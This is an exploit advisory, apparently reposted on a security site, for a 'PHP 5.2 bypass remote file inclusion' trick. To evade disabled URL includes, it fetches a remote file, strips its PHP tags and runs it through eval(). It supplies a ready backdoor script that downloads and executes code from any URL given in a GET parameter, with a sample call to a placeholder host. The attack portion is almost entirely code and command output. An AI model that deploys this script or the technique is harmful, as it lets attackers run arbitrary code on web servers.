PHP 5.2.* Bypass Remote File Inclusion

2009-01-07 / 2009-01-08
Credit: AL-MoGrM
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

--- 1. Example1 --- bt ~ # curl http://xxx.com/images/Ex/r.txt <?php print "Welcome ... :)\n"; ?> bt ~ # php -r "include('http://xxx.com/images/Ex/r.txt');" PHP Warning: include(): URL file-access is disabled in the server configuration in Command line code on line 1 PHP Warning: include(http://xxx.com/images/Ex/r.txt): failed to open stream: no suitable wrapper could be found in Command line code on line 1 PHP Warning: include(): Failed opening 'http://xxx.com/images/Ex/r.txt' for inclusion (include_path='.:/usr/lib/php') in Command line code on line 1 bt ~ # php -r '$file=implode("\n",file("http://xxx.com/images/Ex/r.txt"));$t0v=str_replace("<?php", "",$file);$t0v=str_replace("?>", "",$t0v);eval($t0v);' Welcome ... :) bt ~ # --- 1. Example2 --- <?php /* ************************ * Include any File php * * PHP (Bypass 5.2.*) * ************************ * Coded By AL-MoGrM * * T0v@hotmail.Com * ************************ */ if($_GET[t0v]){ $file=implode("\n",file($_GET[t0v])); $t0v=str_replace("<?php", "",$file); $t0v=str_replace("<?", "",$t0v); $t0v=str_replace("?>", "",$t0v); eval($t0v); } ?> # http://site.com/file.php?t0v=http://xxx.com/images/Ex/r.txt --- 2. Greets --- ("Mohajer22","abu nwaf") --- 3. Contact --- Author : AL-MoGrM Email : t0v [at] hotmail [dot] com www.tryag.com www.tryag.cc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top